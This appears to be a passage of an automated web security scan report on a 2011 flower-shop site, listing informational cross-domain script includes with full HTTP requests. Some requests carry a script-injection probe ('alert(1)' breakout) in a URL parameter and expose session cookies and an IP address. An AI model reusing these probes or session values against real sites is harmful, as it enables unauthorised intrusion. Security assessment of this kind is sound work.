Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

17.2. https://accounts.proflowers.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/>


<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

17.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:09:31 GMT
Content-Length: 46815


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:21:25 GMT
Content-Length: 62175


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="SectionContainer">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="LargeMiscColumn">
   
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/views_cardmessagepreview.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
</div>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>
                               
                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

17.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Issue detail

The response dynamically includes scripts from the following other domains (those visible in the captured response below): a248.e.akamai.net, cdn.mercent.com

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
